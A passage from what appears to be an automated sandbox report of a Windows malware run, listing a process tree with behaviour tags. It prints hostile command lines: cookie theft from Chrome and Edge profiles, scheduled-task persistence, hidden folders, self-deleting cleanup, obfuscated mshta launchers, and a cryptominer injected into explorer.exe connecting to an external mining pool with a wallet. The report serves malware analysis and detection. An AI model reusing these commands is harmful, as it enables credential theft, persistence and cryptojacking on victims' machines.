                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            8⤵
                                                                            • Executes dropped EXE
                                                                            PID:5164
                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            8⤵
                                                                            • Executes dropped EXE
                                                                            PID:6104
                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            8⤵
                                                                              PID:1324
                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              8⤵
                                                                                PID:3596
                                                                          • C:\Users\Admin\Documents\2Xap7nelxJsjTD22X7JqiSAt.exe
                                                                            "C:\Users\Admin\Documents\2Xap7nelxJsjTD22X7JqiSAt.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            PID:4532
                                                                            • C:\Windows\SYSTEM32\schtasks.exe
                                                                              schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                                                              7⤵
                                                                              • Creates scheduled task(s)
                                                                              PID:4284
                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                              cmd /c attrib +H +S "C:\ProgramData\\Provisioning" & attrib +H +S "C:\ProgramData\\Provisioning\*" /S /D
                                                                              7⤵
                                                                                PID:4328
                                                                                • C:\Windows\system32\attrib.exe
                                                                                  attrib +H +S "C:\ProgramData\\Provisioning"
                                                                                  8⤵
                                                                                  • Views/modifies file attributes
                                                                                  PID:5732
                                                                                • C:\Windows\system32\attrib.exe
                                                                                  attrib +H +S "C:\ProgramData\\Provisioning\*" /S /D
                                                                                  8⤵
                                                                                  • Views/modifies file attributes
                                                                                  PID:4924
                                                                              • C:\ProgramData\Provisioning\settings.exe
                                                                                "C:\ProgramData\Provisioning\settings.exe"
                                                                                7⤵
                                                                                • Drops file in Drivers directory
                                                                                • Drops desktop.ini file(s)
                                                                                PID:1996
                                                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                                                  schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                                                                  8⤵
                                                                                  • Blocklisted process makes network request
                                                                                  • Executes dropped EXE
                                                                                  • Creates scheduled task(s)
                                                                                  PID:2256
                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                  cmd /c attrib +H +S "C:\ProgramData\\Provisioning" & attrib +H +S "C:\ProgramData\\Provisioning\*" /S /D
                                                                                  8⤵
                                                                                    PID:5308
                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      9⤵
                                                                                        PID:5688
                                                                                      • C:\Windows\system32\attrib.exe
                                                                                        attrib +H +S "C:\ProgramData\\Provisioning"
                                                                                        9⤵
                                                                                        • Views/modifies file attributes
                                                                                        PID:4080
                                                                                      • C:\Windows\system32\attrib.exe
                                                                                        attrib +H +S "C:\ProgramData\\Provisioning\*" /S /D
                                                                                        9⤵
                                                                                        • Views/modifies file attributes
                                                                                        PID:1968
                                                                                • C:\Users\Admin\Documents\uBMBo9M4M4EcRDtFvt9PnPv9.exe
                                                                                  "C:\Users\Admin\Documents\uBMBo9M4M4EcRDtFvt9PnPv9.exe"
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  • Suspicious use of SendNotifyMessage
                                                                                  PID:620
                                                                                  • C:\Users\Public\run.exe
                                                                                    C:\Users\Public\run.exe
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:3160
                                                                                    • C:\Users\Public\run.exe
                                                                                      C:\Users\Public\run.exe
                                                                                      8⤵
                                                                                      • Loads dropped DLL
                                                                                      PID:4604
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\run.exe"
                                                                                        9⤵
                                                                                          PID:4264
                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                            timeout /T 10 /NOBREAK
                                                                                            10⤵
                                                                                            • Delays execution with timeout.exe
                                                                                            PID:5112
                                                                                      • C:\Users\Public\run.exe
                                                                                        C:\Users\Public\run.exe
                                                                                        8⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4520
                                                                                      • C:\Users\Public\run.exe
                                                                                        C:\Users\Public\run.exe
                                                                                        8⤵
                                                                                          PID:4648
                                                                                    • C:\Users\Admin\Documents\1bqJL_WLJvkBEbECbpZedyS3.exe
                                                                                      "C:\Users\Admin\Documents\1bqJL_WLJvkBEbECbpZedyS3.exe"
                                                                                      6⤵
                                                                                        PID:2256
                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          7⤵
                                                                                            PID:5552
                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5640
                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:3480
                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                            7⤵
                                                                                              PID:3964
                                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              7⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:3808
                                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                              7⤵
                                                                                                PID:4520
                                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                7⤵
                                                                                                  PID:5828
                                                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                  7⤵
                                                                                                    PID:5688
                                                                                                • C:\Users\Admin\Documents\WPUuClMcxwyMHdB4mTb6xUMH.exe
                                                                                                  "C:\Users\Admin\Documents\WPUuClMcxwyMHdB4mTb6xUMH.exe"
                                                                                                  6⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:4248
                                                                                                • C:\Users\Admin\Documents\DI4uRZCojm7RP275Bob8sCnk.exe
                                                                                                  "C:\Users\Admin\Documents\DI4uRZCojm7RP275Bob8sCnk.exe"
                                                                                                  6⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  • Checks processor information in registry
                                                                                                  PID:1696
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im DI4uRZCojm7RP275Bob8sCnk.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\DI4uRZCojm7RP275Bob8sCnk.exe" & del C:\ProgramData\*.dll & exit
                                                                                                    7⤵
                                                                                                      PID:5756
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /im DI4uRZCojm7RP275Bob8sCnk.exe /f
                                                                                                        8⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:5108
                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                        timeout /t 6
                                                                                                        8⤵
                                                                                                        • Delays execution with timeout.exe
                                                                                                        PID:5956
                                                                                                  • C:\Users\Admin\Documents\00Hdsi7rWcVceyZ8jsPqh1_p.exe
                                                                                                    "C:\Users\Admin\Documents\00Hdsi7rWcVceyZ8jsPqh1_p.exe"
                                                                                                    6⤵
                                                                                                      PID:3480
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:1798690 "__IRAFN:C:\Users\Admin\Documents\00Hdsi7rWcVceyZ8jsPqh1_p.exe" "__IRCT:3" "__IRTSS:0" "__IRSID:S-1-5-21-3686645723-710336880-414668232-1000"
                                                                                                        7⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:4904
                                                                                                        • C:\Users\Admin\AppData\Roaming\Sentry Framework\smartmap.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\Sentry Framework\smartmap.exe"
                                                                                                          8⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          • Checks processor information in registry
                                                                                                          PID:6140
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im smartmap.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Roaming\Sentry Framework\smartmap.exe" & del C:\ProgramData\*.dll & exit
                                                                                                            9⤵
                                                                                                              PID:5224
                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                taskkill /im smartmap.exe /f
                                                                                                                10⤵
                                                                                                                • Kills process with taskkill
                                                                                                                PID:5424
                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                timeout /t 6
                                                                                                                10⤵
                                                                                                                • Delays execution with timeout.exe
                                                                                                                PID:1932
                                                                                                      • C:\Users\Admin\Documents\rZVs_T7ZsLLQMlvYtMijxT0X.exe
                                                                                                        "C:\Users\Admin\Documents\rZVs_T7ZsLLQMlvYtMijxT0X.exe"
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        PID:4768
                                                                                                        • C:\Users\Admin\Documents\rZVs_T7ZsLLQMlvYtMijxT0X.exe
                                                                                                          C:\Users\Admin\Documents\rZVs_T7ZsLLQMlvYtMijxT0X.exe
                                                                                                          7⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:4796
                                                                                                      • C:\Users\Admin\Documents\7Wyd4RyWSrxq5QN1KdFsUlxr.exe
                                                                                                        "C:\Users\Admin\Documents\7Wyd4RyWSrxq5QN1KdFsUlxr.exe"
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:4540
                                                                                                        • C:\Users\Admin\Documents\7Wyd4RyWSrxq5QN1KdFsUlxr.exe
                                                                                                          "C:\Users\Admin\Documents\7Wyd4RyWSrxq5QN1KdFsUlxr.exe"
                                                                                                          7⤵
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          PID:5896
                                                                                                      • C:\Users\Admin\Documents\QbVnyXFemlJMoKyFQWnB1Zxu.exe
                                                                                                        "C:\Users\Admin\Documents\QbVnyXFemlJMoKyFQWnB1Zxu.exe"
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:4352
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
                                                                                                          7⤵
                                                                                                            PID:5240
                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                              schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
                                                                                                              8⤵
                                                                                                              • Creates scheduled task(s)
                                                                                                              PID:5504
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\services64.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                                                                                                            7⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            PID:5908
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
                                                                                                              8⤵
                                                                                                                PID:5904
                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                  schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
                                                                                                                  9⤵
                                                                                                                  • Creates scheduled task(s)
                                                                                                                  PID:1560
                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                8⤵
                                                                                                                  PID:5484
                                                                                                                • C:\Windows\explorer.exe
                                                                                                                  C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.supportxmr.com:3333 --user=89UyhNJWGyP6xoycGBA3A6HjdNEs7g3jr34EXVtqGYzg5wLEbmZY2AcGy5Kw5NRfjaYTUyW1dKCHGinv7fGMg45zVCRQwNM --pass=30-60-miner --cpu-max-threads-hint=30 --cinit-idle-wait=5 --cinit-idle-cpu=60
                                                                                                                  8⤵
                                                                                                                    PID:4616
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2536 -s 544
                                                                                                            4⤵
                                                                                                            • Program crash
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:776
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                            4⤵
                                                                                                              PID:3980
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                                              4⤵
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:4076
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c sonia_2.exe
                                                                                                              4⤵
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:2464
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c sonia_1.exe
                                                                                                              4⤵
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:1228
                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                        1⤵
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        • Modifies registry class
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:780
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                          2⤵
                                                                                                            PID:4280
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                            2⤵
                                                                                                            • Drops file in System32 directory
                                                                                                            • Checks processor information in registry
                                                                                                            • Modifies data under HKEY_USERS
                                                                                                            • Modifies registry class
                                                                                                            PID:4260
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS888D4164\sonia_1.exe
                                                                                                          sonia_1.exe
                                                                                                          1⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:588
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS888D4164\sonia_1.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\7zS888D4164\sonia_1.exe" -a
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:1560
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS888D4164\sonia_6.exe
                                                                                                          sonia_6.exe
                                                                                                          1⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Adds Run key to start application
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:1156
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:3944
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4688
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                            2⤵
                                                                                                              PID:5268
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                              2⤵
                                                                                                                PID:4664
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS888D4164\sonia_2.exe
                                                                                                              sonia_2.exe
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              • Checks SCSI registry key(s)
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              PID:816
                                                                                                            • C:\Windows\system32\rUNdlL32.eXe
                                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                              1⤵
                                                                                                              • Process spawned unexpected child process
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:4164
                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                2⤵
                                                                                                                • Loads dropped DLL
                                                                                                                • Modifies registry class
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:4192
                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                              1⤵
                                                                                                              • Process spawned unexpected child process
                                                                                                              PID:1092
                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                2⤵
                                                                                                                • Loads dropped DLL
                                                                                                                • Modifies registry class
                                                                                                                PID:4696
                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                              1⤵
                                                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                              • Executes dropped EXE
                                                                                                              PID:3288
                                                                                                            • C:\Windows\System32\SLUI.exe
                                                                                                              "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
                                                                                                              1⤵
                                                                                                                PID:588
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\C290.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\C290.exe
                                                                                                                1⤵
                                                                                                                • Checks BIOS information in registry
                                                                                                                • Checks whether UAC is enabled
                                                                                                                • Drops desktop.ini file(s)
                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                PID:4532
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\C35D.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\C35D.exe
                                                                                                                1⤵
                                                                                                                • Loads dropped DLL
                                                                                                                • Checks SCSI registry key(s)
                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                PID:5772
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\CE5A.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\CE5A.exe
                                                                                                                1⤵
                                                                                                                • Checks BIOS information in registry
                                                                                                                • Checks whether UAC is enabled
                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                PID:1064
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\D3BA.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\D3BA.exe
                                                                                                                1⤵
                                                                                                                • Loads dropped DLL
                                                                                                                PID:5880
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\D7B3.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\D7B3.exe
                                                                                                                1⤵
                                                                                                                  PID:512
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\DD70.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\DD70.exe
                                                                                                                  1⤵
                                                                                                                    PID:4976
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\E09E.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\E09E.exe
                                                                                                                    1⤵
                                                                                                                    • Checks computer location settings
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    PID:384
                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      2⤵
                                                                                                                        PID:5756
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\E09E.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\E09E.exe
                                                                                                                        2⤵
                                                                                                                          PID:5288
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\EE0C.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\EE0C.exe
                                                                                                                        1⤵
                                                                                                                          PID:4336
                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                          1⤵
                                                                                                                            PID:1324
                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                            C:\Windows\explorer.exe
                                                                                                                            1⤵
                                                                                                                              PID:2008
                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                              1⤵
                                                                                                                                PID:5524
                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                1⤵
                                                                                                                                  PID:4252
                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                  1⤵
                                                                                                                                    PID:5788
                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                    1⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:5820
                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    1⤵
                                                                                                                                      PID:5212
                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                      1⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:5552
                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      1⤵
                                                                                                                                        PID:4432
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\4F96.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\4F96.exe
                                                                                                                                        1⤵
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        • Checks processor information in registry
                                                                                                                                        PID:5008
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im 4F96.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\4F96.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                          2⤵
                                                                                                                                            PID:5544
                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                              taskkill /im 4F96.exe /f
                                                                                                                                              3⤵
                                                                                                                                              • Kills process with taskkill
                                                                                                                                              PID:4896
                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                              timeout /t 6
                                                                                                                                              3⤵
                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                              PID:1304
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\5341.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\5341.exe
                                                                                                                                          1⤵
                                                                                                                                            PID:4020
                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                              "C:\Windows\System32\mshta.exe" vBScRIpT: ClOSe ( creAteOBJect ( "WScrIpt.sHeLL" ). RUN ( "C:\Windows\system32\cmd.exe /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\5341.exe"" SSD3pQMwaP.exe && STaRT sSD3PQMWaP.exe -PmLQymN~qiAE1Rr & if """" == """" for %y In (""C:\Users\Admin\AppData\Local\Temp\5341.exe"" ) do taskkill -Im ""%~nxy"" /f " , 0 , tRUE ) )
                                                                                                                                              2⤵
                                                                                                                                                PID:4824
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "C:\Windows\system32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\5341.exe" SSD3pQMwaP.exe &&STaRT sSD3PQMWaP.exe -PmLQymN~qiAE1Rr& if "" == "" for %y In ("C:\Users\Admin\AppData\Local\Temp\5341.exe" ) do taskkill -Im "%~nxy" /f
                                                                                                                                                  3⤵
                                                                                                                                                    PID:5328
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\SSD3pQMwaP.exe
                                                                                                                                                      sSD3PQMWaP.exe -PmLQymN~qiAE1Rr
                                                                                                                                                      4⤵
                                                                                                                                                        PID:5924
                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                          "C:\Windows\System32\mshta.exe" vBScRIpT: ClOSe ( creAteOBJect ( "WScrIpt.sHeLL" ). RUN ( "C:\Windows\system32\cmd.exe /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\SSD3pQMwaP.exe"" SSD3pQMwaP.exe && STaRT sSD3PQMWaP.exe -PmLQymN~qiAE1Rr & if ""-PmLQymN~qiAE1Rr"" == """" for %y In (""C:\Users\Admin\AppData\Local\Temp\SSD3pQMwaP.exe"" ) do taskkill -Im ""%~nxy"" /f " , 0 , tRUE ) )
                                                                                                                                                          5⤵
                                                                                                                                                            PID:5368
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\system32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\SSD3pQMwaP.exe" SSD3pQMwaP.exe &&STaRT sSD3PQMWaP.exe -PmLQymN~qiAE1Rr& if "-PmLQymN~qiAE1Rr" == "" for %y In ("C:\Users\Admin\AppData\Local\Temp\SSD3pQMwaP.exe" ) do taskkill -Im "%~nxy" /f
                                                                                                                                                              6⤵
                                                                                                                                                                PID:1768
                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
